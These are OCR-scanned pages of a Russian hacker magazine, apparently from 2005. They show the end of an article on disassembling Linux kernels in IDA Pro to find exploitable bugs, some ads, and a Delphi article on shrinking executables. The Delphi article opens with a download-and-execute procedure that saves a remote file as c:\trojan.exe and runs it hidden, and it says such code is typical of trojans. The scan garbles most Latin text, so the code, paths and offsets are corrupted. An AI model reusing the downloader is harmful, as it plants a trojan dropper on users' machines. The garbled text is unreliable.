мен! Это миллионы строк ассемблерного кода, и если на каждую команду 
потратить хотя бы несколько секунд, даже поверхностный анализ растянет- 
ся, как минимум, на сезон. Но ведь нам и не нужно дизассемблировать все 
ядро целиком! Ошибки не размазаны тонким слоем по машинному коду, а 
гнездятся в известных всем местах. Никто не говорит, что ловить баги про- 
сто. Зато интересно! Признайся, разве тебе никогда не хотелось заглянуть 
в ядро, потрогать машинный код руками и посмотреть, как все это выгля- 
дит в живую (то есть, «на самом деле»), а не в исходных текстах, который 
любой «чиста хакер» может скачать из Сети? И эта возможность сейчас 
представится! 



[штурм ядра] Для штурма ядра нам, во-первых, понадобится само ядро, 
которое мы собрались штурмовать. Какой дистрибутив выбрать? Лучше 
взять тот, что поновее, хотя особой разницы между ними нет, ведь ядро 




разрабатывается независимо от остальной «начинки». Главное, чтобы он 
был широко распространен, иначе, какой прок от дырки, которая есть толь- 
ко на одной-двух машинах во всем мире? 

Ядро будет лежать в директории /ЬооІ под именем ѵтііпиг. В действитель- 
ности, это еще не ядро, а только символическая ссылка на него. Само же 
ядро лежит рядом под именем ѵтііпиг.х.у.2, где хуг — версия ядра. Мы по- 
кажем, как распотрошить ядра 2.4.27 и 2.6.7, входящие в мой любимый ди- 
стрибутив Кпорріх 3.7. Остальные ядра исследуются аналогичным обра- 
зом, только смещения, естественно, будут другими. 

Кроме самого двоичного файла нам также потребуются его исходные тек- 
сты, с которыми в случае чего мы будем сверяться. Если они не входят в 
дистрибутив (а большинство популярных дистрибутивов занимают всего 
один СО и распространяются без исходных текстов), их можно скачать с 
ѵѵѵѵт.кетеІ.огд/риЬ/Ііпих/кегпеІ/. Нам придется принять от 25 до 45 МЬ и 
освободить на жестком диске, по крайней мере, 1 50 — 300 МЬ для распаков- 
ки архива. Все ядра поставляются в упакованном виде в двух форматах — 
стандартном дгір'е и более продвинутом Ьгір2, который жмет на 25% плот- 
нее, что уменьшает размер ядра чуть ли не на 10 МЬ, а для модемного со- 
единения это очень ощутимая величина. 

Что касается дизассемблера, то лучше, чем ЮА Рго ты вряд ли что-то най- 
дешь. До недавнего времени ЮА Рго работала только под МЗ-003, 05/2, 
ѴѴІпсІоѵѵз, но теперь она перенесена и на Упих, что не может не радовать. 
Обладателям более древних версий можно посоветовать скопировать ядро 
на дискету и дизассемблировать его под ѴѴІпсІо\л/з или воспользоваться 
эмулятором ѴѴІпе — ЮА Рго замечательно работает и под ним. Кстати го- 
воря, на Еіпих перенесена только консольная версия, которая лишена всех 
графических вкусностей, например, диаграмм. 

Если нет денег на ЮА Рго, можно попробовать НТ-ебіІог — бесплатный Ьех- 
редактор и дизассемблер в одном флаконе. Он автоматически восстана- 
вливает перекрестные ссылки, трассирует поток управления, поддержива- 
ет символьные имена и комментарии. Грубо говоря, это усеченная ЮА Рго 
в миниатюре. Исходные тексты последней версии можно скачать с 
Ш.ві.пеі. Они успешно компилируются под Еіпих, РгееВЗО, ОрепВЗО и, ко- 
нечно же, ѴѴІП32. Но если тебе лень компилировать, можно скачать уже го- 
товый бинарный файл, правда, далеко не первой свежести. 

[внутри ядра] Наступает волнующий миг: файл ѵтііпиг загружается в ди- 
зассемблер! Начинается самое интересное: ЮА Рго не может опознать 
формат и загружает его как бинарный, а это уже нехорошо. Ядро имеет 
сложную структуру, состоящую из нескольких последовательно отрабаты- 
ваемых один за другим загрузчиков, а основная часть ядра упакована. Как 
разобраться со всем этим хозяйством? Задача-минимум: распотрошить 
ядро на модули, определив базовый адрес загрузки и разрядность каждо- 
го из них. Кто-то может сказать: «А в чем, собственно, проблема? Ведь у 
нас есть исходные тексты!» Что ж, исходные тексты это, конечно, хорошо, 
но вот вопрос — какой файл какой части ядра соответствует? Так что без 
хорошего путеводителя здесь никуда! 

Первые 200И байт файла ѵтііпиг принадлежат Ьооі-сектору, который грузит- 
ся по адресу 0000:7000 и выполняется в 16-разрядном режиме. Нажимаем 
<А11-5> или обращаемся к меню "ЕсІІІ -> Зедтепі -> ЕсІІІ Зедтепі" (здесь и да- 
лее горячие комбинации указаны для ЮА Рго 4.7, в других версиях они могут 
слегка отличаться). Вводим имя сегмента: Ьоо(, начальный адрес оставляем 
без изменений, а конечный меняем на 2001т. На все грозные предупреждения 
отвечаем однозначным уез. Затем подводим курсор к первому байту кода и 
нажимаем <С>, чтобы ЮА Рго превратила ячейки памяти в код. После этого 
дизассемблирование можно продолжать как обычно. Исходный код загрузчи- 
ка можно найти в фате /агсЫі386/ЬооІ/ЬооІвесІ.З, а можно и не искать — нам 
он не интересен. За долгие годы он вылизан дочиста. Даже, если какие-то ба- 
ги в нем есть, использовать их, скорее всего, не удастся. 

Мы видим, что Ьооі-сектор перемещается по адресу 9000іт:00001т и считывает 
с диска вторичный загрузчик, который также находится внутри ѵтііпиг, сразу 
за Ьооі-сектором. Здесь расположены модули зеІир.З и ѵібео.З, загружаю- 
щиеся по адресу 10001т:00001т и работающие в 16-разрядном режиме. Начало 
модуля зеІир.З опознается по сигнатуре НбгЗ, следующей после )тр'а. Конец 
ѵібео.З легко определить по строкам: СО/ѴМО/ѴНѲА/ЕОА/ѴѲА/ѴЕЗА/Ѵісіео 
асіаріег, вслед за которыми идет «магическая последовательность» 00 00 В8 
00 00. В обоих ядрах он 
расположен по смеще- 
нию 14РР от начала 
файла. Таким образом, 
вторичный загрузчик на- 
чинается со смещения 
200І1 и заканчивается в 
14РРІ1. Он также испол- 
няется в 16-разрядном 
режиме и представляет 
собой смесь кода и дан- 



ных, поэтому дизассемблировать его приходится с большой осторожностью. 
Но прежде необходимо создать новый сегмент, ведь предыдущий был усечен! 
Роворим "ЕсІІІ -> Зедтепі -> Меѵѵ Зедтепі", вводим имя сегмента (например, 
"Ісіг"), адрес начала (2001т) и конца (1 5000), а также базовый адрес, равный стар- 
товому адресу, деленному на 1 00. срорсируем 1 6-битный режим и давим ОК. 
За вторичным загрузчик идет 1000 «ничейных» байт, забитых нулями, а вот 
затем со смещения 1 5000 начинается какой-то дикий код, который никак не 
удается дизассемблировать. ЮА выводит всего несколько строк, жалобно 
пищит и отказывается продолжать работу: 

[ЮА Рго дизассемблирует «дикий» код] 



1600 

1601 

1602 

1605 

1606 



сЮ 
сіі 

тоѵ ах, 18(1 
бЬО 
бЬО 

1607 бЬ8Е(і;0 

1608 бЬ 008(1 ; + 



НТЕ и НІЕѴѴ как будто дизассемблируют дикий код, но делают это неправильно! 

[(Неверный результат дизассемблинта] 



1600 1с 


с(б 


1601 Іа 


с(і 


1602 681800 


тоѵ ах, 0x1 8 


1605 0000 


абб [Ьх+$і], а( 


1607 8 еб 8 


тоѵ бз, ах 


1609 8ес0 


тоѵ е$, ах 


160Ь 8ее0 


тоѵ 1 з, ах 


1606 8 ее 8 


тоѵ дз, ах 



А все потому, что именно о этого места ядро начинает исполняться в 32- 
разрядном защищенном режиме, и для правильного дизассемблирования 
разрядность сегмента необходимо изменить. После чего ЮА Рго заработа- 
ет как ни в чем ни бывало. Сейчас мы находимся в распаковщике, подго- 
тавливающем основной ядерный код к работе. Он реализован в файлах 
/агсМ386/Ьооі/сотргевзесІ/кіеасІ.З и тізо.с. «Персонального» адреса загруз- 
ки он не имеет и грузит- 
ся вместе с первичным 
загрузчиком по адресу 
10001т:00001т. Таким об- 
разом, первый байт 
распаковщика располо- 
жен в памяти по адресу 
100011:000011 + Бігеоі(ісіі) 

== 10001і:013001і, что 
соответствует физиче- 
скому адресу ІОІЗООИ. 

Распаковщик настраи- 
вает сегментные реги- 
стры ОЗ/ЕЗ/ЗЗ/ОЗ/РЗ 
на селектор 181і, а ре- 
гистр С5 настраивает 
на селектор ЮЛ. 




вторичный загрузчик, представляющий собой 
смесь кода и данных 
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редактор ТНЕ за комплексным поиском 



дизассемблирование ядра в консольной версии ЮА Рго под Еіпих 



аіохімп 













[хакер 08 [80] 05 > ЫМІХОЮ 108 ] 



За концом распаковщика идут текстовые отроки «8уз(ет ИаІІесІ», «Ок, 
Ьооііпд (Ие кегпеі», «іпѵаіісі оотргеззесі ^огтаі (егг=1)», за ними следует 
длинная цепочка нулей, а потом начинается упакованный код, дизас- 
семблировать который без предварительной распаковки невозможно. 
А как его распаковать? Поскольку линуксоиды не любят изобретать ве- 
лосипед и всегда стремятся использовать готовые компоненты, ядро 
сжимается с помощью дгір. 

Упакованный код начинается с «магической последовательности» 1 Р 8В 08 
00, которую легко найти в любом Иех-редакторе. В ядре 2.4.27 она распо- 
ложена по смещению 4904И, а в ядре 2.6.7 по смещению 49041т от начала 
файла. Выделим область отсюда и до конца файла, и запишем ее в файл 
с расширением дг (например, кегпеі. дг). Пропустив ее через дгір (дгір -б 
кегпеі.дг), мы получим на выходе готовый к дизассемблированию образ 
ядра. ЮА Рго уже ждет, когда он будет в нее загружен. 

Основной код ядра исполняется в 32-разрядном режиме и грузится в память 
по адресу 10:001000006. В самом начале идет модуль /агсЛ/Шб/кеглеИте- 
ас1.8, а затем іпіі.с, подгружающий все остальные модули. Как определить, 
какому именно модулю соответствует данная часть дизассемблерного кода? 
В директории /Ьооі лежит замечательный файл Зузіет.тар-х.у .2 (где х.у .2 
номер версии ядра), в котором перечислены адреса публичных символь- 
ные имен, они же метки: 

Фрагмент файла Зузіет. тар-2.4.27 

С0108964 Т зу$1ет_са11 
с010899сТ геІ_^гот_зуз_саІІ 
с01089ас1 1 гез1оге_а11 
с01089Ьс I зідпаі_ге1игп 
с01089с14 1 ѵ86_зідпаі_ге1игп 
с01089е4 1 Ігасезуз 
с01 08а07 1 Ігасезуз.ехіі 
с0108а11 I Ьасізуз 

в частности, в ядре 2.4.27 метке ге1_1гот_зуз_саІІ соответствует адрес 
С010899С6. Отняв отсюда базовый адрес, мы получим смещение метки от 
начала файла: 899С6, ну а саму метку нетрудно найти в исходных текстах 
глобальным поиском. Она определена в файле /агсІѴіЗвб/кетеІ/епігу.З. 
Остальные метки обрабатываются аналогично. 

А вот другой трюк: если в ядре встретилась текстовая строка или «редко- 
земельная» команда вроде Ізз или тоѵ сг4,ххх, глобальный поиск легко об- 
наружит ее в исходных текстах. Поскольку компилятор таких команд заве- 
домо не понимает, здесь явно имела место ассемблерная вставка, а зна- 
чит, дизассемблерный код будет практически полностью совпадать с соот- 
ветствующим фрагментом исходного текста! 

В общем, в дизассемблировании ядра нет ничего сверхъестественного, и эта 
задача вполне по силам рядовому кодокопателю. 

[где гнездятся ошибки] В прикладных программах и серверных при- 
ложениях наибольшее количество ошибок сосредоточено в перепол- 
няющихся буферах (атаки типа Ьиііег оѵегііоѵѵ и Ьиііег оѵеггип). В ядре 
также имеются буферы, некоторые из которых могут быть переполне- 
ны, однако атаки этого типа для 
него не так характерны. 

Вот пять основных источников оши- 
бок: опинлоки (зріп Іоок), неожидан- 
ные выходы из функции, ЕкР-за- 
грузчик, менеджер виртуальной па- 
мяти и ТСР/ІР-отек. Рассмотрим 
всех кандидатов подробнее. 

Спинлоками называют ячейки па- 
мяти, защищающими многозадач- 
ный код от воздействия посторонних потоков. При входе в охраняемую 
зону процессор устанавливает специальный флаг, а при выходе его 
сбрасывает. До тех пор, пока флаг не будет сброшен, остальные пото- 
ки топчутся у выхода и не могут выполнять код. На многопроцессорных 
ядрах спинлоки начинаются с префикса ЕОСК, который легко найти в 
дизассемблерном тексте, если нажать <АкТ-Т>. Как мы уже говорили в 
статье «Захват нулевого кольца», поддержка многозадачности очень 
сложная задача, и ошибок здесь просто тьма, так что жаловаться на то, 
что «все баги пофиксены до нас», никому не приходится. К сожалению, 
большинство «многозадачных» ошибок имеют многоступенчатый ха- 
рактер, наглядно продемонстрированный в уже упомянутой статье (см. 
раздел «Проблемы многопоточности»), поэтому никаких универсаль- 
ных методик их поиска не существует. Это работа для настоящих хаке- 
ров, способных удержать все ядро в голове и сложить разрозненную 
мозаику в единую картину. В общем, настоящий хардкор. Это сложно? 
Ну еще бы! Но мы ведь не ищем легких путей, верно? Зато и удовле- 




творение от найденной дыры намного больше, чем от успешного ис- 
пользования публичного сплоита. 



Пример классического спинлока 

кегпе1:С010А65Е 1ос_С010А65Е: ; СООЕ ХВЕЕ: $иЬ_С010А984+108ѵі 
кегпе1:С010А65Е Іоск сіес Ьуіе ріг [еЬх-ЗЕСЕ77Е0й] 

кегпеІ:С010А665 із Іос_С010АА81 



Неожиданные выходы из функции (они же преждевременные) происходят вся- 
кий раз, когда из-за какой-то ошибки функция уже не может (не хочет) продол- 
жить работу и делает немедленный геШгп. Часть работы к этому моменту уже 
выполнена, а часть еще нет. Если программист допустит даже крошечную 
оплошность, структуры данных превратятся в кашу. Одна из таких ошибок со- 
держится в функции сгеаіе_еІМаЫез(), описанной в прошлой статье. 

Для поиска внеплановых выходов достаточно перейти в конец функции и 
проанализировать перекрестные ссылки, которые ведут наверх. Чем их 
больше, тем выше вероятность, что здесь окажется что-то не так. Ну а там 
и до дыры уже недалеко. 



Перекрестные ссылки в конце функции ведут 
к местам внезапното выхода 



кегпе1:С010А810 

кегпе1:С010А810 

кегпе1:С010А815 

кегпе1:С010А815 

кегпе1:С010А815 

кегпе1:С010А815 

кегпе1:С010А816 

кегпе1:С010А817 

кегпе1:С010А818 

кегпе1:С010А819 

кегпе1:С010А81А 



1ос_С010А810: ; СООЕХВЕЕ: кегпе1:С010А7Р1'') 
тоѵ еах, ОЕЕРРРРЕА(і 

1ос_С010А815: ; СООЕХВЕР: кегпеІ:С010А7СР''і 

; кегпеІ:С010А809''і 

рор еЬх 

рор езі 

рор есіі 

рор еЬр 

рор есх 

геіп 




дизассемблирование ядра в бех-редакторе ТНЕ 



версии ядра в другую. 
Некоторые из них уже 
выявлены, некоторые только предстоит найти. В первую очередь следует 
обратить внимание на обработку нестандартных полей или дикое сочетание 
различных атрибутов (см. раздел «Эльфы падают в дамп»). Чтобы действо- 
вать не вслепую, имеет смысл скачать свежую подшивку НРС и обзавестись 
спецификацией на ЕЕР формат. И то, и другое легко найти в Сети. 



Загрузчик ЕЕР-файлов, менеджер виртуальной памяти и ТСР/ІР стек — это 

настоящие айсберги. 



которые словно ледя- 



ные горы торчат из 
ядра кишками наружу, 
но основная масса 
скрыта в глубине воды. 
Это сотни тысяч строк 
кода, сложным обра- 
зом взаимодействую- 
щих между собой. Это 
плодотворная почва 
для всевозможных ба- 
гов, кочующих из одной 



[заключение] Вот мы и добрались до ядра! Погрузились в настоящий ди- 
зассемблерный мир и увидели, как выглядит ЕІпих не только снаружи, но и 
изнутри. Теперь самое главное запастись пивом, пакетными супами и тер- 
пением. Не стоит рассчитывать на быстрый успех. На поиск первой дыры 

могут уйти месяцы, осо- 
бенно, если дизассем- 
блер еще подрагивает 
в неуверенных руках, и 
постоянно перелистыва- 
ется потрепанный спра- 
вочник по машинным 
командам. В режиме по- 
иска багов хакеры не 
отрываются от компью- 
тера по 30 и даже 40 
часов. Дизассемблиро- 
вание затягивает! По- 
пасть к нему в лапы 
легко, а вот вырваться 
очень сложно 0 











Планируешь покупку цифровой камеры, но не знаешь, какую модель выбрать? 



Прочитав наш журнал, ты обязательно сделаешь правильный выбор и 







иОйтИ«*«' 



1ЛЙЕІЙ* 



НАЙДЕШЬ СВОЮ КАМЕРУ! 



ВСЕ КАМЕРЫ В ОЦНОМ ЖУРНАЛЕ 



Выбираем зеркалку и все необходимое к ней. 

Обзоры камер Мікоп СООЬРІХ 51, ОІутриз т]и ОІСІТАЬ 500, Заглзипд Оідітах Ѵ700, 
5опу СуЬег-зМо* 05С-Т7, Сапоп Е05 3500, Сазіо ЕХІЕІМ ЕХ-Р505. 

Свет мойг зеркальце... 

Сравнительный обзор 5 любительских зеркальных цифровых камер. 

И конечног наш сулеркаталог. 

Более 200 моделей цифровой фототехники с крупными иллюстрациями, 

техническими характеристиками, оценками и вердиктами. ■ 



Идеальная камера: какая из них твоя? 



ВЬ1БЕР1ГСВОЙП1ЮТОКАМЕРУ! 










Техника за решеткой 

с ТЕХ ПОР КАК ЗАКІЮЧЕННЫЕ ПОДУЧИЛИ ВОЗМОЖНОСТЬ ПОКУПАТЬ ЭПЕКТРОІ^ІКУ МНОГИЕ 
АМЕР**САНСКИЕ ТЮРЬМЫ СТАЛИ ПОХОЖИ НА МАГАЗИНЬі М-ѲИДЕО НАШИ КОЛЛЕГИ 
ИОСПЕДОВАЛИ ИСПРАШТЕПЬНЬІЕ ЗАвЕДЕТАІЙ В СВОЕЙ СТРАНЕ. ЧІТ06Ы ВЫДЕЛИТЬ САМЫЕ 
ПОПУЛЯРНЫЕ ИЗ НЕЗАЛРЕЩЕИНЫХ ДЕВАкЮОВ. КОТОРЬ€ МОЖНО ИМЕТЬ В ТЮРЬМЕ 
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Оеірііі всемогущий 

ты ПИШЕШЬ НА ДЕЛЬФЯХ И ЧУВСТВУЕШЬ СЕ- 
БЯ АУТСАЙДЕРОМ? ТЕБЕ НЕЧЕМ ОТВЕТИТЬ В 
БЕСКОНЕЧНЫХ НОЕѴѴѴАР'АХ? ТЕПЕРЬ ТЫ ТОЧ- 
НО БУДЕШЬ ЗНАТЬ: ДЕЛЬФИ СТОИТ ТОГО, 
ЧТОБЫ ЕГО ЛЮБИТЬ. И НЕ ТОЛЬКО ИЗ-ЗА 
ПРОСТОТЫ ЭТОГО ЯЗЫКА. ОЧЕНЬ МАЛЕНЬКИЕ 
И ОЧЕНЬ БЫСТРЫЕ ПРОГРАММЫ НА ДЕЛЬФИ — 
ЭТО ВОЗМОЖНО! ТЫ РАССКАЖЕШЬ ОБ ЭТОМ 
ВСЕМ СОМНЕВАЮЩИМСЯ. И С МНЕНИЕМ, ЧТО 
ДЕЛЬФИ — ЯЗЫК ДЛЯ ЛАМЕРОВ, БУДЕТ ПО- 
КОНЧЕНО! ! Мз-Вет (Мз-Вет@уапс1ех.т, тз-гет.пагосі.ги) 

Выжимаем из ОеІрІіі все 
возможное 



Многие системные программисты привыкли считать 
□еІрИІ полным отстоем. Свое мнение они аргументи- 
руют тем, что компилятор генерирует слишком мед- 
ленный и большой код, а средний размер пустой фор- 



мы о кнопкой — 400 килобайт. Впро- 
чем, иногда никаких аргументов и вов- 
се не приводится. Когда на форумах 
сталкиваются поклонники С-н- и Оеіріті, 
первые обычно кричат о супернаворо- 
ченном синтаксисе и потрясающих возможностях ООП, при этом утверждая, что в 
системном программировании все это необходимо, а вторые — о возможностях 
того же ООП на дельфи, которых нет в С-ь-ь, и о том, что на этом языке писать про- 
ще. Из слов и тех, и других можно заключить, что обе стороны ни про Оеіріті, ни про 
С-н- ничего толком не знают, и все это — пустая ламерская болтовня. 

Эта статья посвящена приемам системного программирования на Оеіріті. Она 
написана для тех, кто любит этот язык, хочет добиться максимальной эффек- 
тивности кода и не боится вложить в свое дело определенный труд. Я покажу, 
как делать на дельфи то, что многие считают невозможным. Тем, кто занима- 
ется кодингом на С-ьч-, не составит труда найти целую кучу статей по оптими- 
зации. Если же ты пишешь на ОеІрИІ, ты не найдешь на эту тему ничего хоро- 
шего. Видимо, все считают, что никакой оптимизации здесь не нужно. Может 
быть, тебя устраивает 400-килобайтная пустая форма с кнопкой? А, ты дума- 
ешь, что это неизбежное зло, и уже давно о ним смирился? Что ж, придется 
немного расстроить твои нервы и развеять священные заблуждения. 

[немного о генерируемом компилятором коде] Для начала прове- 
рим утверждение, что компилятор Оеіріті генерирует много лишнего и не- 
эффективного кода. Для этого напишем функцию, скачивающую и запус- 
кающую файл из интернета (такие вещи обычно используют в троянах). Пи- 
сать будем, естественно, с применением АРІ. Вот что у меня получилось: 

ргосегіиге Оош!оа(!АпсІЕхесиІе(Зоигсе: РСІіаг); зМса!!; 
сопзі 

0ез1П!е = 'с:\1го]ап.ехе'; 

Ьедіп 

11г!Оо\л/п!оа(1ТоР!!е(п!!, Зоигсе, 0езІРІ!е, О, пі!); 

\Л/ІпРхес(0ез1РІ!е, ЗѴѴ_Н!0Р); 
епгі; 




На диске лежат полные 
исходные коды всех 
приведенных в статье 
примеров. 



Этот сорец я вставил в программу, скомпилировал и дизассемблировал в 
ЮА. Вот его откомментированный листинг: 

Оо\л/п!оас!АпсІРхесиІе ргос пеаг 
Зоигсе = сіѵѵогсі ріг 8 



ризИеЬр 
тоѵ еЬр, езр 
ризИО 
ризИО 

ризИоІІзеІ 0езіРІ!е 
тоѵ еах, [еЬрч-Зоигсе] 
ризИеах 
ризІіО 

са!! 11ВШо\л/п!оас1ТоР!!еА 
ризИО 

ризИоІІзеІ 0езіРІ!е 
са!! ѴѴІпРхес 
рор еЬр 
ге№ 4 

Оо\л/п!оас!АпсІРхесиІе епрр 
0езІРІ!ес!Ь 'с:\1го]ап.ехе',0 



РРВ!МОЗТАТиЗСАРРВАСК 

ВТОРО 

РРСЗТР 

РРСЗТР 

^Р^NКN0\Л/N 

иСтРЗИоѵѵ 

!рСтсіипе 



Ну, и где же куча лишнего кода, о котором некоторые так любят говорить? 
Все просто и красиво, почти то же самое можно написать вручную на ассе- 
мблере. Тем более, что на нем некоторые умники иногда такое выдают — 
любые ошибки компилятора покажутся мелочью :). 

Почему же программы, написанные на дельфи, такие большие? Откуда бе- 
рется лишний код, если компилятор его не генерирует? Сейчас мы разбе- 
рем этот вопрос подробнее. 

[ООП — двигатель прогресса] ООП — весьма модное в настоящее 
время направление программирования. Его цель — упростить написание 
программ и сократить сроки их разработки, и с нею ООП прекрасно справ- 
ляется. Большинство прикладных программистов, пишущих на С++ или 
□еірбі, уже не мыслят своей деятельности без ООП. Их главный принцип — 
быстрее сдал программу, быстрее получил деньги. В таких условиях о ка- 
кой бы то ни было оптимизации просто забывают. 

А ведь если взглянуть на дело глазами системного программиста, то сразу 
станет очевиден главный недостаток: ООП — качество генерируемого ко- 
да. Допустим, у нас есть класс, наследуемый от другого класса. При созда- 
нии объекта этого класса компилятор будет вынужден полностью включить 
в его состав также код родительского класса, поскольку нет возможности 
определить, какие методы классов использоваться не будут. Если у нас це- 
лое дерево наследования классов, как обычно и бывает в реальных прог- 
раммах, то весь его код войдет в программу, и от этого никуда не денешь- 
ся. Вызов методов класса производится через таблицу, что увеличивает 
время вызова. А когда метод наследуется от родителя в десятом поколе- 
нии, то и вызов проходит через десять таблиц, прежде чем достигает обра- 
батывающего его кода. Получается, что вместе о кучей мертвого кода мы 
получаем еще низкую эффективность рабочего. Все это хорошо видно на 
примере библиотеки ѴСЕ в дельфи. 

А вот программа, написанная на ѴВ или на ѴС с применением МЕС, отче- 
го-то занимает гораздо меньше места. Все потому, что великая и ужасная 
компания МІСГ050Й приложила к этому свою лапу. МЕС и гипііте-библиоте- 
ки в ѴВ весят ничуть не меньше, просто они скомпилены в ВЕЕ и входят в 
поставку ѴѴІпбоѵѵз, а значит, их код не приходится таскать с собой в прог- 
раммах. В защиту Вогіапб можно сказать, что такая возможность присут- 
ствует и в ОеІрИІ. ЕІужно просто в настройках проекта поставить галочку 
ВиіІсІ ѴѴІ1ІТ гипііте раскадез, тогда программа значительно уменьшится, но 
потребует наличия соответствующих гипііте-библиотек. Естественно, эти 
библиотеки в поставку винды не входят, но в этом надо винить не Борланд, 
а монопольную политику мелкософта. 

Любители ООП, желающие разрабатывать программы в визуальном режи- 
ме, могут использовать КОЕ. Это попытка сделать что-то типа ѴСЕ, но с 
учетом ее недостатков. Средний размер пустой формы с кнопкой — 35 Кб, 
что уже лучше, но для серьезных приложений эта библиотека не подходит, 
так как часто глючит. Да и решение это половинчатое. 

Те, кто хочет добиться действительно высокой эффективности кода, долж- 
ны идти по принципиально другому пути: забыть про ООП и все, что с ним 
связано, раз и навсегда. Писать программы придется только на чистом АРЕ 

[виновник номер два] Создадим в Оеіріті пустой проект, заведомо не 
содержащий никакого полезного кода: 

ргодгат 8атр1е; 

Ьедіп 

епсі. 

После компиляции в ОеІрІті 7 мы получаем экзешник размером в 13,5 Кб. 
Откуда?! Ведь в программе ничего нет! Ответ на этот вопрос опять помо- 
жет дать !ОА. Дизассемблируем экзешник и посмотрим, что он содержит. 
Точка входа в программу будет выглядеть так: 

риЫіс $1аг1 

зіагі: 

ризИ еЬр 
тоѵ еЬр, езр 
асісі езр, ОРРРРРРРОИ 
тоѵ еах, оРРзеІ МосІиІеІсІ 
саІІ _ІпіІЕхе 

; здесь мог бы быть наш код 
саІІ _РІапсІІеРіпаІІу 
СООЕ епсіз 

Весь лишний код находится в функциях _!пі1Ехе и _НапсІ!еЕіпа!!у. Дело в том, 
что к каждой ОеІрІті программе неявно подключается код, входящий в состав 
ЕІТЕ (Еіип Тіте ЕІЬгагу). Эта либа нужна для поддержки таких возможностей 



языка, как ООП, работа со строками (зігіпд) и специфичные для паскаля функ- 
ции (АззідпЕІ!е, ЕіеасіЕп, ѴѴгіІеЕп, еіс.). !пі1Ехе выполняет инициализацию всего 
этого добра, а Напсі!еЕіпа!!у обеспечивает корректное освобождение ресурсов. 
Сделано это, опять же, для упрощения жизни программистам, и примене- 
ние ЕІТЕ иногда оправданно, так как может не понизить, а повысить эффек- 
тивность кода. Например, в состав ЕІТЕ входит менеджер кучи, который 
позволяет быстро выделять и освобождать маленькие блоки памяти. 
По своей эффективности он в три раза превосходит системный. В плане 
производительности генерируемого кода работа со строками реализована 
в ЕІТЕ тоже довольно неплохо, правда все равно, в увеличении размера 
файла, ЕІТЕ — виновник номер два после ООП. 

[уменьшаем размер] Если минимальный размер в 13,5 Кб тебя не уст- 
раивает, то будем убирать Ое!рЫ ЕІТЕ. Весь код либы находится в двух фай- 
лах: Зузіет.раз и ЗузіпіЕраз. К сожалению, компилятор подключает их к 
программе в любом случае, поэтому единственное, что можно сделать, — 
удалить из этих модулей весь код, без которого программа может рабо- 
тать, и перекомпилить модули, а полученные ОСЕІ-файлы положить в пап- 
ку с программой. 

Файл Зузіет.раз содержит основной код ЕІТЕ и поддержки классов, но все это 
мы выбросим. Минимальное содержимое этого файла должно быть таким: 

ипіі Зузіет; 
іпіеііасе 

ргосебиге _НапсІІеЕіпаІІу; 

Іуре 



Тбию = гесогб 




01: ЕопдѴѴогсІ; 




02: ѴѴогсІ; 




03: ѴѴогсІ; 




04: аггау [0..7] о1 Вуіе; 


епб; 




РІпіЮопІехІ = '' 


ТІпііСопІехІ; 


ТІпіЮопІехІ = гесогб 


ОиІегСоШехІ: 


РІпіІСоШехІ; 


ЕхсЕгате: 


Роіпіег; 


ІпіІТаЫе: 


роіпіег; 


ІпііСоипІ: 


Іпіедег; 


Мобиіе: 


роіпіег; 


ОЕЕЗаѵеЕВР: 


Роіпіег; 


ОЕЕВаѵеЕВХ: 


Роіпіег; 


0ЕЕ8аѵеЕ8І: 


Роіпіег; 


ОЕЕЗаѵеЕОІ: 


Роіпіег; 


ЕхіІРгосез$ТЕ8: 


ргосебиге; 


ОШпіІЗІаІе: 


Вуіе; 



епб; 

ітріетепіаііоп 

ргосебиге _НапсІІеЕіпаІІу; 

азт 

епб; 

епб. 




[хакер 08 [80] 05 > КОДИНГ 113] 



[хакер 08 [80] 05 > кодинг 114] 




Описания структуры ТѲиЮ компилятор требует в любом случае и без нее 
компилировать модуль отказывается. ТІпіІСопІехІ понадобится линкеру, ес- 
ли мы будем собирать ОЬЬ. НапгіІеРіпаІІу — процедура освобождения ре- 
сурсов ВТР, компилятору она тоже необходима, хотя может быть пустой. 
Теперь урежем файл 8уеІпі1.раз, который содержит код инициализации и завер- 
шения работы НТР и управляет поддержкой пакетов. Нам хватит следующего: 

ипіі Зузіпіі; 
іпіегіасе 

ргосесіиге _ІпіІЕхе; 
ргосесіиге _ІіаІЮ; 

ргосесіиге _ІпіШЬ(СопІехІ: РІпііСопІехІ); 
ѵаг 

МосІиІеІзЫЬ: Вооіеап; 

ТІзІпсІех: Іпіедег = -1; 

Тізіазі: Вуіе; 

сопзі 

Р^^ТоNІI: Роіпіег = піі; 
ітріетепіаііоп 

ргосесіиге _ІпіШЬ(СопІехІ: РІпііСопІехІ); 

азт 

епсі; 

ргосесіиге _ІпіІЕхе; 

азт 

епсІ; 

ргосесіиге _ІіаІ10; 

азт 

епсі; 

епсі. 

ІпіІЕхе — процедура инициализации ВТО для ЕХЕ-файлов, ІпіІЕІЬ — для 
□ЕЕ, ИаІЮ — завершение работы программы. Все остальные лишние 
структуры и переменные, которые пришлось оставить, необходимы ком- 
пилятору. Они не будут включаться в выходной файл и никак не повли- 
яют на его размер. 

Теперь положим эти два файла в папку о проектом и скомпилируем их из 
командной строки: 

сісс32.ехе -0 зузіет.раз зузіпіі.раз -М -У - 2 . -$0- -0 

Избавившись от ВТЕ, мы получили экзешник размером в 3,5 Кб. Борландо- 
вский линкер создает в исполняемом файле шесть секций, они выравнива- 
ются по 512 байт, к ним плюсуется РЕ-заголовок, что и дает эти 3,5 Кб. 

Но вдобавок к малому размеру, мы получаем и определенные затруднения, 
так как теперь не сможем использовать заголовочные файлы на ѴѴІпАРЕ 
идущие о ОеІрИІ. Вместо них придется писать свои. Это нетрудно, посколь- 
ку описания используемых АРІ можно брать из борландовских хедеров и 
переносить в свои по мере необходимости. 

Если в составе проекта есть несколько РАЗ-файлов, линкер для выравнива- 
ния кода вставит в него пустые участки, и размеры опять увеличатся. Чтобы 
этого избежать, нужно всю программу, включая определения АРІ, помещать 




в один файл. Это весьма неудобно, поэтому лучше воспользоваться директи- 
вой препроцессора $1МСЕЕЮЕ и разнести код на несколько іпс-файлов. Тут 
может встретиться еще одна проблема — повторяющийся код (когда несколь- 
ко іпс-файлов подключают один и тот же іпс), компилятор в таких случаях ком- 
пилировать откажется. Выйти из положения можно, воспользовавшись ди- 
рективами условной компиляции, после чего любой іпс-файл будет иметь вид: 

{$ІІпсІеІ \л/іп32арі1 
{$сіе1іпе ѵѵіп32арі) 

// здесь идет наш код 

{$еп(Ш! 

Таким образом, можно писать без РТЕ достаточно сложные программы и 
забыть о неудобствах. 

[можно еще меньше!] Наверняка минимальный размер экзешника в 3,5 
